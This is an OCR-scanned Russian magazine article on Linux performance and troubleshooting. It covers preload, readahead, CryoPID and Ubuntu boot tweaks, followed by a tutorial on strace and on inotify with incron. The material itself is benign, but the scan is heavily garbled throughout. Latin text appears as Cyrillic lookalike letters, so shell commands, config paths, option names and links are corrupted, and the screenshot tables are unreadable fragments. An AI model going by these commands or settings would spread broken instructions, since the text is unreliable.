ЗАГРУЗКА ИЛИ РРЕЬОАВ 

Хорошим дополнением кргеііпкстанет демон ргеіоасі, 
реализующий механизм предварительной загрузки библио- 
текдля часто используемых приложений. Работая в фоне, 
ргеіоасі анализирует действия пользователя и составляет 
списокнаиболее часто используемых приложений. В 
дальнейшем эта информация применяется для заблаговре- 
менной загрузки приложений и необходимых им библиотек 
в память, благодаря чему холодный запуск программы 
занимает намного меньше времени. 

Демон ргеіоасі может существенно повысить скорость за- 
грузки приложений, но произойдет это только в том случае, 
если система оснащена достаточно большим объемом 
памяти. Два гигабайта — это минимум, при котором ргеіоасі 




> ІП^О 



• Свой вариант 
ргеііпк есть 

и в Мае 05 X. Там 
он носит имя 
«ргеЬіпбіпд». 

• Реализация ргеіоасі 
для ѴѴіпсІоѵѵз носит 
имя «РгеІеІсЬег» 
(позднее «5ирег- 
Ееіеб») и доступна, 
начиная с ѴѴіпсІоѵѵз ХР. 

• Вместо 
классической 
системы іпіі, 
дистрибутив ІЭЬипІи 
использует систему 
параллельной 
загрузки сервисов 
ирзіагі, которая 
может сократить 
среднее время 
инициализации 
системы до 1 5-20 
секунд. 

• сгуорісІ.ЬегІіоз.сІе — 
домашняя страница 
СгуоРІВ. 

• реорІе.гебЬаІ.сот/ 
]акиЬ/ргеІіпк.рсІІ — 
описание Ргеііпк от 
авторов. 

• Ьеббасі.огд/ргеіоасі. 
рек — описание Рге- 
іоасі от авторов. 

• ѵѵѵѵѵѵ.сбескроіпііпд. 
огд — список ПО для 
заморозки процессов. 

• сіппіср.зоигсе- 
Іогде.пеі — 
распределенная 
система заморозки 
процессов. 
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даст выигрыш, при меньших объемах он только помешает. Пакет 
ргеіоасі можно найти в составе любого современного дистрибутива, 
поэтому для его установки достаточно использовать стандартный 
менеджер пакетов: 

$ зисіо арС-деС іпзРаІІ ргеіоасі 



Далее следует отредактировать конфигурационный файл /еІс/ргеЬасІ. 
сопб Демон вполне сносно работает и при стандартных настройках, 
однако каждый из нас индивидуален и использует систему по-своему, 
поэтому, вероятно, ты захочешь подогнать ргеЬасІ под себя. Перечислю 
основные опции в секции тосіеі: 

• сусіе — частота обращений к системе для сбора статистики. Значение 
поумолчанию — 20 секунд. В большинстве случаев изменять его не 
имеетсмысла, однако если ты чувствуешь, что ргеЬасІ вредит произво- 
дительности системы, увеличь значение. 

• Ьаі^іі^е — задает интервал, по истечению которого ргеіоасі будет 
забывать накопленную статистику на 50%. Значение поумолчанию — 

168 часов (неделя). Рекомендуется уменьшить значениетем, кто часто 
меняет софт, и увеличить тем, кто может месяцами/годами пользоваться 
одним итемже набором приложений. 

• тіп5І2е — минимальный размер объекта (программы, библиоте- 
ки), обрабатываемого ргеіоасі. Значение по умолчанию — 2 000 000 
байт (около 2 Мб), поэтому ргеіоасі не будет выполнять предвари- 
тельную загрузку файлов меньшего размера. Нет особой нужды 
менять это значение, однако если тебе кажется, что памяти будет 
достаточно и для кэширования более мелких приложений — умень- 
ши значение. 

• тетіоіаі, тет^гее, тетсасЬесі — эти три опции взаимосвязаны и 
указывают на потребляемый ргеЬасІ объем памяти. Для расчетов ис- 
пользуется следующая формула: (общее количество памяти х ппеппіоіаі) + 
(память, доступная при старте х тетігее) + (кэш х тетсасЬесі). 

Секция зузіет также содержит три интересных для нас опции: 

• тарргеЯх — список каталогов, файлы которых должны быть предвари- 
тельно загружены (имей в виду, что это нетолько бинарники и библиоте- 
ки, но и другиетипы файлов). 

• ехергеі'іх — список каталогов с бинарными файлами. 

• 50гІ5ІгаІеду— способ оптимизации операций ввода-вывода. Значение по 
умолчанию — 3 (оптимизация для жестких дисков). Для твердотельных дисков 
лучше всего подойдетзначение 1,для сетевых файловых систем — 2. 

На этом все, можешь перезагрузить ргеЬасІ: 



$ зисіо /еДс/іпіС . (і/ргеіоасі геіоасі 




СоІсІЗ^агІѵз. РгеІоасЛаипсИ Тітез 



ОезИорІоэп [с ■ 
ООлѴМгйег 



Гіг&^огс 

Еѵіоіійіоп 

ОесіК 

Сгоппе Тегпіпаі 






ІРгеІоасІесІ 



В 10 15 20 25 30 35 

Игте (іп 8есопй$) 



Сокращение скорости запуска при использовании 
Ргеіоасі 



перезагрузи систему, во время загрузки нажми <Е5С> для входа в меню 
загрузчика, далее нажми <е> и добавь в конец списка параметров ядра 
слово ргоЫе. Нажми <Ь> для загрузки. Инициализация системы в режи- 
ме профилирования займетвремя, поэтому будь готов потерпеть. 

ЗАМОРОЗКА ПРОЦЕССА ИЛИ СРУОРІО 

Иногда лучший способускорить запуск приложения — просто не оста- 
навливатьего. Для многих юниксоидов работающие сутками напролет 
браузер, почтовый и )аЬЬег-клиенты — обычное дело. Такие приложения 
просто нет смысла завершать, они могут понадобиться в любую минуту. 
Так почему бы не развить эту идею дальше и не сделать та к, чтобы вместо 
остановки процессов их состояние можно было бы заморозить, а позже 
— восстановить, избавив программу отнеобходимости каждый раз 
производить сложную и трудоемкую инициализацию внутреннего состо- 
яния? Не мы первые, не мы последние. СгуоРІО — простое приложение 
для заморозки процессов и последующего их восстановления. Прога не 
требует прав гооі: или модификации ядра, работает на архитектурах х86 
и атб64 и, что самое главное, не привязываетзамороженный процесс к 
конкретной машине. После заморозки процесс превращается во что-то 
вроде само распаковывающегося архива, ты легко можешь перенести 
его на другую машину и просто запустить. Пакет СгуоРІО есть далеко не в 
каждом дистрибутиве, поэтому его придется установить самостоятельно: 



Как и любой другой демон, ргеіоаб ведетлоги, которыеты сможешь 
найти в файле /ѵаі/іод/ргеіоаб. [од. Информация о текущем состоянии 
ргеіоаб и его кэше доступна в файле/ѵаг/ііь/ргеіоаб/ргеіоаб.зіаіе. 

ПРЕДВАРИТЕЛЬНОЕ 
ЧТЕНИЕ ИЛИ КЕАОАНЕАО 

ОЬипІи, атакже некоторые другие современные дистрибутивы Ыпих, 
используютсистему геабаЬеаб во время инициализации системы. Как и 
демон ргеіоаб, геабаЬеасІ заранее загружает необходимые компоненты 
приложений в оперативную памятьс цельюускорить ихзапуск. Разница 
заключается лишь втом, что геабаЬеаб частично работает внутри ядра 
Ыпих и оптимизирован специально для ускорения процесса инициали- 
зации системы. 

Система используетутилиту/зЬіп/геабаЬеаб-ІізІ, которая читает файлы 
/е[с/геабаЬеаб/Ьоо[ и /еІс/геабаЬеаб/безкІор и загружает перечислен- 
ные в них файлы во время инициализации системы. Эта простая и эф- 
фективная схема, которая, однако, имеет и очевидные недостатки. Дело 
втом, что любая стандартная установка СЬипІи со временем претерпе- 
вает изменения в количествеустановленных и загружаемых во время 
старта ОС сервисов. Списки файлов в этом случае становятся неактуаль- 
ными итребуютобновления. Параметр ядра ргобіе позволяет перестро- 
ить списки предварительно загружаемых файлов. Для его включения 



$ С(і /Стр 

$ ѵ\?деС ІЩЦр : //(іадоЬаІі.исс . азп. аи/ѵ\?аску/сгуорі(і-0 . 5 . 9 . 1- 
ІЗ 86 . Саг . дт. 

$ Раг -Х 2 р сгуорісі-0 . 5 . 9 . 1-І386 . Раг . дг 
$ ссі сгуорісі-0 .5.9. 1/згс 
$ таке 

$ тксііг ~/Ьіп 
$ ср Ргееге ~/Ьіп 

После этого можно запустить программу следующим образом: 

$ -/Ьіп/Ргеезе имя-файла рісі-поцесса 

Ксожалению, СгуоРІО имеет несколько проблем, включая неполную 
поддержку сокетов и Х-приложений, а также генерирует мусор в списке 
процессов вместо имени восстановленной программы. 

ШУСТРАЯ ЗАГРУЗКА увимту 

ОЬипІи быстра, на самом деле быстра. Скорость загрузки этого дистрибу- 
тива оставляет далеко позади многие другие ли нуксы и заставляет зави- 
довать поклонников В50-систем. Однако нет пределов совершенству, и 
в этом разделе мы попробуем ускорить ускоренное. 



► 096 
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5еІесі Міе зегѵісез І1іа( уои ші5И іо асііѵаіе; 







Й 

Й 





81 



МаіІ адепі (роаМ'х) 

Оеііѵеіз уоиг оиідоіпд таіі 

МаіІ ГеІсИег {ГеісНтаІІ) 

Ооѵѵпіоасіз уоиг лпаіі Ігот гетоіе ассоипи 

Миііісазі 0№ вегѵісе сіізсоѵегу 
Роѵѵег шападетепі [асрМ) 
Рожег тападетепі (артсО 



Ргіпіег аегѵісе {сира) 



АІІ0И5 арріісаііопз іо иэе ргіпіегз 



1 ®Не1р 




Цліоск 1 


1 


Щсіоае 1 


Окно управления сервисами 1 


в ОЬипШ 







Ор«пОЯк«.огд 

имсОаи 

(ЯптЫ 



РЛЬ» 

Сѳіоп 

Рол* 

$осип(у 



Асс«*«МКу 

ІМО 

Юа«І/$«м 
Іалдимо $«№09* 
ОропОто. огд »пе*г 
ОропОИКо. огд ѵѵлег/ЖеЪ 
О^опОЛко.огд ва<« 

МопмГ 



ЦитЬог оі Хор* 

СгарМс* сасЪо 
Цм (от ОропОАсо.огд 
Иопюгу р*г оЬ»*<Г 
Вотоѵ* І!го«п пмтогу «Ног 
СосЬо Іог юіоПоа оЬ)ос(> 
NитЬ•^ о( ѳррсіс 



20 О 

12Ѳ О ме 
20.0 о ме 
ООіІОО Мчтоп 

20 о 



СК іопеоі Ы*» 

Оптимизируем работу ОрепОі'Лсе.ога 



• Еѵо1и1:іоп Аіагт КоЕііЕіег — сигнализатор прихода почты 
в ЕѵоІиРіоп 

• РгіпР Сиеие АррІеР — апплет очереди печати 

• Тгаскег — служба поиска и индексирования 



1 . Отключи таймаут в дгиЬ. По умолчанию за грузни кждетЗ секунды, 
чтобы пользователь смог изменить параметры загрузки. Открой файл 
/Ьооі/дгиЬ/тепи.ІзІ:, найди строку «бппеои1;=3» и замени 3 на 0. 

2 . Отключи зрІазЬ. ОЬипШ зрІазЬ-зсгееп, показываемый во время 
загрузки системы, малоинформативен и требует время на свою загрузку. 
Поэтому открываем все тотже/Ьооі/дгиЬ/тепи.ІзІ: и убираем опции 
«диіеі:» и «зрІазЬ» из параметров загрузки ядра. 

3 . Отключи ІРѵб. Раньше поддержка пока ненужного протокола ІРѵб 
в Ыпих была реализована в виде загружаемого модуля, поэтому для 
ее отключения требовалось лишь слегка отредактировать файл /еіс/ 
тобргоЬе.б/аІіазез. Сегодня ІРѵб вшитпрямо в ядро, поэтому для его 
отключения ядру должен быть передан параметр «ірѵ6.бІ5аЫе=1 ». Сде- 
лать это можно, отредактировав файл /Ьооі/дгиЬ/тепи.ІзІ:. 

4 . Отключи проверку на выход из спящего режима. Во время своей 
загрузки ядро выполняет проверку, выходит ли комп из спящего режима 
(зизрепб) или выполняет обыкновенную загрузку. Занимает эта про- 
цедура всего одну секунду, однако ее тоже можно сэкономить, добавив 
опцию «погезиппе» к параметрам загрузки ядра. Естественно, владель- 
ца м н оутбу ко в это го дел ать н е стоит. 

5 . Оптимизируй іпіігатіз. Образ ВАМ-диска используется для хране- 
ния низкоуровневых компонентов 00, которые должны быть доступны 
еще до монтирования корневой файловой системы. Поумолчанию этот 
образ содержит всевозможные компоненты, подобранные на все случаи 
жизни. Без них образ грузится в память быстрее, что способствует 
сокращению общего времени загрузки системы. Открываем файл 
/еіс/іпіігаппі'з-іооіз/іпкгаппі'з.сопб находим строку «М001ЛЕ5=тоз1:» и 
заменяем ее на «М000ЕЕ5=бер». Далее пересобираем все доступные 
образы только с необходимыми компонентами: 

$ зибо ирбабе-іпіЦгатбз -к а11 -и 

После обновления ядра образы будутсгенерированы автоматически. 

6 . Отключи ненужные сервисы. Поумолчанию в Обопри активировано 
множество фоновых сервисов на все случаи жизни. Вряд ли тебе нужны 
они все, поэтому идем отключать. Открываем Зузіепп Абппіпізігабоп 

Зегѵісез и видим списоксервисов. Выбор кандидатов на отключение 
зависит от конкретной ситуации, но в большинстве случаев безболез- 
ненно можно пожертвовать следующим: 



7 . Отключи автостарт ненужных приложений. Во время входа в 
систему происходит автозапуск большого количества различ- 
ных приложений (в основном это апплеты). Не все они нужны, 
поэтому открой Зузіепп ^ Ргеіегепсез ^ АррИсаІіопз зіа гй р 
и удали все, что считаешь ненужным (например, апплет 
ЫиейоОі) . За пуск оста вш ихся приложений можно немного 
оптимизировать с помощью следующего трюка : отредактируй 
строку за пуска каждого из нихтак, чтобы она приняла пример- 
но такой ВИД: 

зк -с "зіеер 10; ехес ЫчеСоокк-аррІек " 

зк -с "зіеер 20; ехес /изг/ІіЬ/еѵоІиСіоп/2 . 28/ 

еѵоІиРіоп-аІагт-поЦіІу " 

Для каждого следующего приложения число должно увеличиваться на 
10. Такты сделаешь загрузку ВЕ более равномерной. 

УСКОРЯЕМ ЗАПУСК ТЯЖЕЛОВЕСОВ 

Многиетяжеловесные приложения, используемые нами повседневно, 
слишком медлительны и неповоротливы. Нередко на ихзапускуходит 
больше минуты, что довольно сильно раздражает и мешаетсконцентри- 
роваться на работе. Попробуем это исправить. 

• ОрепОНісе.огд. Этот офисный пакет рекордсмен по потреблению 
ресурсов и неповоротливости, поэтому его оптимизации необходимо 
уделить особое внимание. Открываем Тооіз Оркопз, переходим 

к подразделу «Метогу». Устанавливаем значение «Мит бег оі 
зіерз» равным 20, это уменьшит размер истории отмены. В секции 
«Огарбісз сасбе» устанавливаем значение «Озе Ьг ОрепОкісе. 
огд» в 1 28, «Метогу рег об)ес1:» — в 20. В подсекции «Оаѵа» убираем 
галочку с опции «Озе а Оаѵа гипбте епѵігоптепі:». Оптимизация 
позволяет поднять скорость запуска и время реакции. 

• Ріге^ох. Огнелис — вторая по уровню прожорливости и тормознутости 
программа. Начиненная достаточно большим количеством плагинов, 
она превращается из огненной лисы в замороженную черепаху, но есть 
два пути ускорить ее запуск. Первый — удалить все ненужные и редко 
используемые плагины. Это поднимет и скоростьзапуска, и произво- 
дительность. Второй — оптимизировать базу здбіе, используемую для 
хранения данных профиля: 

$ Ііпб ~/ .то2І11а/1іге1ох/ -пате *.зд1іке \ 

-ехес з^1іЦеЗ {} ѴАСІШМ \; 



• Віиекоокк Мападег — менеджер устройств ВІиеСооСк 



» Скеск ІОГ пеѵ7 кагбѵ\?аге бгіѵегз — проверка новых версий 



проприетарных драйверов 
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Делать ЭТО необходимо регулярно (например, раз в неделю), так как 
базы постоянно растут и захламляются. пг 



► 097 







иыіхою 



Чу/. 

трассировки 

Решение проблем с приложениями при помощи 
утилиты 8(гасе 



Юрий «Асіері» Видинеев ; 



Представь ситуацию: ты поставил новую классную прогу, а она не 
запускается или безбожнотормозит. Или сетевой сервис падает при 
непонятных обстоятельствах. Досадно! Ситуация усугубляется тем, что 
ни в консольном выводе, ни в логах ничего интересного нет. Но и в этом 
случае можно предпринять ряд действий, которые, если и не помогут 
устранить проблему в запуске, то хотя бы позволят составить правильный 
ба г- ре порт. 



ЗНАКОМСТВО 

Первый помощник в таком случае — это 
зігасе. Для тех, кто вдруг не читал статью в 
#1 0 за 2009 год («Танцы с бубном и на- 
пильником»), напомню, что работа зігасе 
заключается в перехвате и записи систем- 



ных вызовов, выполненных процессом, а 
также полученных им сигналов. Сігасе может 
помочь в следующих ситуациях: 

• если приложение отказывается работать 
из-за проблем с правами; 

• если приложение не запускается из-за 



отсутствия какого-нибудь нужного файла; 

• в некоторых случаях с помощью зігасе 
быстрее, чем с помощью Ісрб утр, можно 
обнаружить проблемы с сетевыми прогами; 

• при проблемах с физическим или псев- 
доустройством (типа /беѵ/гапсіопп или /беѵ/ 



► 098 
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ФаіЧл Правка вікд Терминал Справка 



йПс гл ;-А ігг'С; т - 1 й гл пі: ^ я гасе - ■('с 1^ і г<ч^ еж 

І^ им зесйойі и^(Сі/саи саИі еггог& &у$саІІ 



99.59 &.15Ѳ6В4 19?Б5 9 ѴЗІГа 

0.24 Ѳ.ѲѲ& 1 БЭ эз 11 екесѵе 

Ѳ.Ѳ6 ѳ.еѳ0вЭ7 0 1169 ѵгііеѵ 

0.Й4 0.6000Б2 0 2Э!№ раіі 

Ѳ.93 Ѳ.9ѲѲ949 0 227 *ЯЭІ: 

Ѳ.вЭ Ѳ.ѲѲѲѲ46 0 397 173 ореп 

0.60 0.600600 0 2565 1176 Гс6[1 

0.60 0.600600 0 7 ѵгііе 

0.60 0.600600 0 276 СІ65С 

ѳ.еѳ 0.ѲѲ060Ѳ 0 59 32 ііаі 

0.60 0.600600 0 0 ІЕІаІ 

! В.60 В,60В600 0 6 ІІМЬ 

0.60 0.600600 0 469 опар 

0.60 0.600600 0 196 аргоіесі: 

0.60 0.600600 0 40 аиінар 

0.60 0.600600 0 31 Ьгк 

0.60 0.000600 0 в деіеиі^і 

0.60 0.600600 0 4 деіедіб 

I 0.60 0.600660 0 4 деіррю 

0.60 0.600660 0 0 деІрГйир^ 

0.60 0.О006В0 0 1 де^ге^иісі 

0.60 0.600600 0 1 де!ге!:дісІ 

0.60 0.600600 0 1 йСаій 

0.60 0.600600 0 1 ^сІіаР дЕ^рагат 

0.60 0.6Ѳ06ѲѲ 0 1 «ііесІ~5еисИе4Гииг 

0.60 0. 600600 0 1 ісвііей деисЬесгииг 

0.60 0.600660 0 3 ісііесі деі ргійгиу ілх 

0.60 0.000600 0 2 ^сЬеР дЕТ;_:ргіогі1;у >1п 

0.60 6.0ѲѲ6ѲѲ і И ѳг^іі ргсП 

0.60 0.600600 0 4 1 

0.60 0.600660 0 1 І« 1і(І а^бге&!1 

0.60 0.000600 0 I с1осЬ_дё^г« 

0.60 0.600600 0 1 561 Грьи5і ии 



160.60 0.151501 7051 1402 Іоіаі 

дгіс^рТі'Дді1(>рІ:-1йпГсір:^5 I 



Сокращенная статистика 5І:гасе для ПгеЬх 



а и СІИ:) зігасе покажет последний незавершенный вызов; 
• если надо отследить все файлы, к которым обращается 
приложение в процессе работы. Это может быть полез- 
ным, например, для составления профиля АррАгтог 
или переноса приложения в среду сЬгооІ;. В простейшем 
случае вызов зігасе выглядит следующим образом: 



$5(гасе ипате 

ехесѵе ( " /Ьіп/ипате " , ["ипате"], [/* 36 ѵагз 
*/] ) =0 

Ьгк(О) = 0х1есі2000 

ассезз ( " /еДс/Ісі . 30 . поілл^сар " , Р_ОК) = -1 
ЕЫОЕЫТ (N 0 зиск :Еі1е ог сіігесЦогу) 
ттар(ЫиЕЕ, 8192, РЕОТ_ЕЕАВ | РЕОТ_ШЕІТЕ , 
МАР_РКІѴАТЕ I МАР_АЫОЫУМОиЗ , -1, 0) = 
0х71Ь79108а000 

ассезз ( " /еРс/Ісі . 30 . ргеіоасі" , К_ОК) = -1 
ЕЕОЕЫТ (N 0 зиск Іііе ог сіігесРогу) 
ореп ( " /еРс/ІсЗ. 30 . саске " , 0_КВ0ЕЕУ) = 3 
1зРа1:(3, { з1і_тосіе = 3_ІРКЕС I 0 644 , зР_ 
зІ2е=133ббО, . . .}) =0 



### Попытка получить доступ к большому коли- 
честву файлов, в основном из каталога /изг/ 
1іЬ/1оса1е/ги_КВ .иРІ8 

ипате ( { зуз= " Еіпих" , побе= " аберР-ІарРор " , 

. . . }) =0 



По умолчанию весь вывод зігасе отправляет в вЫегг, что 
далеко не всегда удобно. Попросить зігасе писать вывод 
в файл можно с помощью опции '-о': 



$ збгасе -о ипате. зВгасе ипате 



Первый системный вызов — ехесѵе: запуск файла на вы- 
полнение. В скобках передается команда с аргументами 
(если они есть) и количество переменных окружения, пе- 
реданных процессу. По умолчанию зігасе не показывает 
сами переменные окружения, но его можно попросить 
выводить более подробную информацию с помощью оп- 
ции '-ѵ'. Вызов возвратил О — значит все ок. В противном 
случае значение было бы -1 . 




Статистика файловых операций с кэшем 
Рігеі'охза 1 минуту при активном серфинге 

Следующий интересный системный вызов — ассевз: 
проверка прав пользователя на файл. В данном случае 
тестируется существование файла (о чем говорит режим 
проверки Р_0К). На третьей строчке системный вызов 
вернул значение -1 (ошибка) и вывел ошибку ЕМОЕМТ 
(Мо зисЬ Еіе ог бігесШгу). Это нормально, так как этот 
файл всего лишь служит для указания линковщикуна ис- 
пользование стандартных неоптимизированных версий 
библиотек. 

Как правило, с помощью вызова ассезз проверяют- 
ся только права на файл или существование самого 
файла, без каких-либо последующих манипуляций над 
файлом. Манипуляции над файлом всегда начинаются 
с системного вызова ореп, открывающего файл в одном 
из режимов (0_ЕП0М1У, 0_ѴѴЕ0МІУ или 0_ЕПѴѴЕ). 

Вызов возвращает небольшое целое число — файловый 
дескриптор, который впоследствии будет использовать- 
ся другими вызовами (до того момента, пока не будет 
закрыто помощью вызова сіозе). 

После открытия файла вызовом ореп происходит его 
чтение вызовом геаб или запись вызовом ѵѵгке. Оба 
вызова принимают файловый дескриптор, а возвращают 
количество прочитанных/записанных байт. 

Вызов [зіаі; предназначен для получения информации о 
файле (номер іпобе, иіб,діб и т.д.) 

Самый главный вызов в листинге выше — ипате, кото- 
рый позволяет получить информацию о текущем ядре. 
Если трассировка ипате занимает всего сотню строк, то 
трассировка серьезного приложения легко может зани- 
мать несколько тысяч строк. Читать та кой лог— не самое 
большое удовольствие. Поэтому иногда лучше записы- 
вать в лог только определенные вызовы. Например, что- 
бы отследить все вызовы ореп и ассезз (а на них следует 
обращать внимание в первую очередь при проблемах с 
запуском приложения): 

$ збгасе -е Цгасе=ореп , ассезз \ 

-о збгасе.іод ипате 

Вместо перечисления всех нужных вызовов можно 
использовать классы, состоящие только из специали- 
зированных ВЫЗОВОВ: Еіе, ргосезз, пеіѵѵогк, зідпаі или 
ірс. Также можно писать в лог все вызовы, кроме одного. 
Например, чтобы исключить вызов т тар: 

$ збгасе -е Цгасе=\!штар -о зРгасе.Іод ипате 

К сожалению, исключить из вывода сразу несколько 
вызовов не получится. 

Некоторые приложения в процессе работы любят на- 
плодить большое количество дочерних процессов. По 
умолчанию зігасе игнорирует дочерние процессы, но 
это поведение можно изменить с помощью опции '-Г. 
Если вывод 31 га се пишется в лог, то удобно использовать 
опцию '-ІГ, которая заставляет зіга се писатьтрассировку 
каждого процесса в отдельный лог вида ІіІепате.РІП. 




> ѵѵагпіпд 

Из соображений 
безопасности не 
следует запускать [бб 
на подозрительных 
бинарниках — это 
может привести 
к выполнению 
вредоносного 
кода. Подробности, 
например, тут: 
ѵѵѵѵѵѵ.саіоптаі.пеі:/ 
Ыод/Ібб-агЬіІгагу- 
собе-ехесиііоп/ . На 
подозрительных 
файлах лучше 
использовать геабеІЕ 




НТТР://ѴѴѴѴѴѴ 

"■ Г 

> Ііпкз 

зігасе.зоигсеіогде. 

пеі 

ѵѵѵѵѵѵ.игасе.огд 

дііЬиЬ.сот/гѵоісіІаз/ 

іпоібу-іооіз 




> ІП^О 

• Системные вызовы 
— это «интерфейс» 
между ядром 

и приложением. 

Ядра Ыпих ветки 
2.6 имеют более 400 
различных вызовов. 

• Информацию 

о каждом системном 
вызове можно найти 
во втором разделе 
тап. Например, 
про повсеместно 
встречающийся 
вызов ореп можно 
посмотреть так: «тап 
2 ореп». 

• Для работы зігасе 
используется 
системный вызов 
рігасе. 

• Для трассировки 
библиотечных 
вызовов есть 
отдельный 
инструмент — Игасе. 

► 099 
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иыіхою 





С помощью запасе можно отследить, к каким файлам обращалось 
конкретное приложение. Но иногда возникаетобратная задача — 
отследить обращения копределенному файлу и выполнить какие- 
то действия при этих обращениях. Тогда на помощь придет меха- 
низм іпобіу. ІпоіТу — подсистема ядра, позволяющая отслеживать 
файловые операции. Технология проверена временем — она была 
включена еще в ядро 2.6.13 (июнь2005). Іпобіу активно использует- 
ся, например, десктопными поисковиками (вроде Веадіе), а также 
такой полезной штукой, как іпсгоп. 

Іпсгоп — аналог обычного сгоп стой лишь разницей, что выполне- 
ние команды происходит не повремени,апо наступлению указан- 
ного в задании события. 

После установки (іпсгоп есть в репозиториях большинства дистри- 
бутивов) создается пустой файл /еіс/іпсгоп.аиоѵѵ, в котором надо 
перечислить пользователей, которым разрешено использовать 
іпсгоп. 

Создаются задания с помощью команды: 



$ іпсгопСаЬ -е 
Форматзаданий: 

<путь> <событие> <команда> (с разделением через 
пробел) 

Самые интересные события 

ІР_АССЕЗЗ — файл был прочитан 

ІЕ_АТТКІВ — изменились метаданные файла /каталога 
ІЕ_МОВІРУ — файл был изменен 

ІВ_СКЕАТЕ — файл или каталог был создан в отслежи- 
ваемой директории 

ІЕ_ВЕЕЕТЕ — файл или каталог был удален в отслежи- 
ваемой директории 

ІЕ_ВЕЕЕТЕ_ЗЕЕР — отслеживаемый файл или каталог был 
удален 

ІЕ_МОѴЕ — файл был перемещен из отслеживаемого ката- 
лога или в него 
ІЕ_АЕЕ_ЕѴЕЕТЗ — все события 

В описании команды можно использовать внутренние перемен- 
ные. Самые полезные: 



$@ — полное имя отслеживаемого файла/каталога 
$# — относительное имя файла, вызвавшего событие 
(только при мониторинге каталога) 

$% — название события 



Еще одна весьма полезная возможность зі: га се: с помощью опции 
'-р' и указания РІО можно проводить трассировку работающего 
процесса. Можно даже соединиться сразу с несколькими процесса- 
ми, указав опцию '-р' несколько раз. Воттакая конструкция запустит 
трассировку всех процессов арасЬе: 

# збгасе -б $ (рібоб арас1іе2 | зеб ' з / \ ( [ О -9 ] * \ ) / \ -р 

и/д' ) 

Чтобы показать всю мощь зігасе, опишу несколько случаев из моей 
практики, в которых без помощи этой удивительной утилиты на поиск 
и устранение проблемы я потратил бы кучу времени. 

ПРОБЛЕМЫ с ПРАВАМИ 

Давным-давно, когда апаче ще бы л версии 1.3,аРНР — 4, переехал 
я на новый сервак. И практически сразу вылезла одна проблема — из 



Файл Правка Вид Терминал Справка 



айері@айерг-Іаргор:'$ Игасе -с /и$г/ІіЬ/орепоТГісе/ргодгалі/$о^Тісе.Ьіп 
% Ііте 5есоп(1$ и$ес$/саІІ саііз ^ипсііоп 



57.85 


2.353339 


276 


85ѲѲ ги аІІосагеНепюгу 


36. 9Ѳ 


1.5Ѳ1144 


15Ѳ1144 


1 $оТТісе таіп 


5.1Ѳ 


Ѳ.2Ѳ7642 


31 


6682 ги ^гееМетогу 


Ѳ.Ѳ8 


Ѳ.ѲѲ3243 


115 


28 дхх регзопаШу ѵѲ 


Ѳ.Ѳ7 


Ѳ.ѲѲ2835 


2835 


1 іаІОеіаіІіпШаІіге 


Ѳ.ѲѲ 


Ѳ.ѲѲѲѲ26 


26 


1 5аІ Оегаіі ОеіпШаІіге 



1ѲѲ.ѲѲ 4.Ѳ68229 15133 1:о(аІ 

ас1ері(аа(іерг-Іаргор:'$ | 



Статистика библиотечных вызовов ОрепОі'Лсе 



РНР с помощью обычной функции таіі не отправлялись письма. За- 
глянул в логи индейца — пусто, в логах сен дм ыл а и системных логах 
— тоже ничего интересного. СточнотакимижеконфигамиарасЬе, 
РНР и зепбтаіі на другом сервере все работало, значит, причина 



Немного истории 



ЗФасе (сокращение отзузіет Фасе) — это свободное ПО, распростра- 
няемое под В5В-подобной лицензией. Утилита была написана в 1991 
году Полом Краненбургом для ЗипОЗкаканалогутилиты Фасе. На Еіпих 
ее портировал Бранко Ланкестер, который также реализовал поддерж- 
кувядре. В 1992 годувышла версия2.5дляЗипОЗ, новерсиядля Еіпих 
все еще базировалась на версии 1.5. В 1993 году Ри к Слэдки объеди- 
нил зФасе 2.5 для ЗипОЗ и второй релиз зФасе для Еіпих, добавив при 
этом много возможностей отФизз из ЗѴР4. В результате появилась 
зФасе, которая работала и на Еіпих, и на ЗипОЗ. В 1994 Рик портировал 
зФасе на ЗѴР4 и Зоіагіз, а в 1 995 — на Ігіх. Оегодня зФасе поддержи- 
вается большим количеством людей, в списке разработчиков даже 
успел отметиться самЛинус. Последняя на момент написания статьи 
версия — 4.5.20 от 1 4 апреля 2010 года. зФасе сейчас достаточно актив- 
но развивается, в основном добавляется поддержка и фиксятся баги 
при работе на всяких экзотичных архитектурах. 




Кроме Іпсгоп есть еще полезная штука, использующая іпоОі'у — 
іпоОІу-ФоІз, включающая в себя іпоОІуѵѵаіІ: и іпобІуѵѵаФЬ, которые 
оченьудобно использовать в скриптах. ІпоОІуѵѵаіІ просто ждет 
указанных событий над указанными файлами и завершается с тем 
или иным кодом возврата. Немного модифицированный скриптиз 
тап'а, хорошо иллюстрирующий предназначение іпоЕІуѵѵаіЕ 

$саІ~/5сгір1.5И 

ѵ^МІе іпобібуѵ^аіб -е тобібу \ 

/ѵаг/1од/арас1іе2 /еггог . Іод; бо 

баіі -1 /ѵаг/1од/арас1іе2 /еггог . Іод I \ 
поРібу-зепб "Арасйе пеебз Іоѵе! " 

боне 

ІпоЕІуѵѵаФЬ просто собирает статистику по обращению копреде- 
ленному файлу/каталогу втечение определенного времени или до 
прерывания и отображает ее в виде таблицы. Есть возможность 
сбора статистики только по определенным событиям, задания 
исключения файлов по маске и чтения списка объектов для монито- 
ринга из файла. 



► 100 
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№>Ал Л|шяи ійд Справяд 



і' і ■ • I 1І-І ■; ■ Л)Ег- . іі'/і V 1 .1 1;- .1^ ;п 

1іпик-І#<9&[У.|[>Л 4(1^€а«07ГГТвй«83»«[>? . 

ііі]|:»і:ііг«4і].іі:».е = /і^ь/ііь^^кя'е«!ілй.& ' 

ІЫіісиІ.н] гпг Ткіл[1 
1і№і}«.5е => кі С«ѵчі 
ШхрСОЯ.ІО П4І І€1КЧІ 

иьр1>354.5е гь /и!;г/ііБ/иьрі4]44.54 сех&вввтт^тт^елввв] 

ІІЬрІ-с^.^а ^ /ігаг/ІІЬ/ІМірІсІ.іа 4ВхЛВѲб/^Ѵ(с4с./ВеЯ^ 

ІЦш^рг* . яр => /иіГ/ІіЬ/1|Ь<чріЧ,5<і (ехНВвТ'Г47'Гг7НЬВН] 

ііін]і.!о.2 -> /и«7им^4Р.2 [ехвФв47Н7^(«шкі 

иь^7іі-кп-2.«лв,і> /ілг/(іь/ііьд7ѵ->.іі-2.«.5о.аі 10гев«в7И7Г'|]в«4М1}» 
ІіЬаІк'І.В.^р.е » Ліаг7ІіЬ/ЪіЬвІк-1.в.5Р.е Г&х№й&7Т47Т[Н«3>&дВ|) 

